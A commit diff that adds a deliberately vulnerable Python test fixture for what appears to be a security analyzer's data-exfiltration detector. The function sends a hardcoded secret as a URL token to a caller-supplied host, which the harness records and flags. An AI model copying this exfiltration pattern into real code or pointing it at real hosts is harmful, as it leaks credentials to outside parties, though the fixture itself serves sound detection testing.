[pitboss] phase 11: Track J.9 + Track L.9 — CRYPTO, JSON_PARSE, UNAUTHORIZED_ID, DATA_EXFIL corpora

tests/dynamic_fixtures/data_exfil/python/vuln.py

@@ -0,0 +1,12 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL vuln fixture.
+#
+# Sends a captured secret to an attacker-controlled host without
+# host validation; the harness's mock HTTP client records the
+# outbound `host` and the `OutboundHostNotIn` oracle fires.
+import urllib.request
+
+
+def run(host):
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)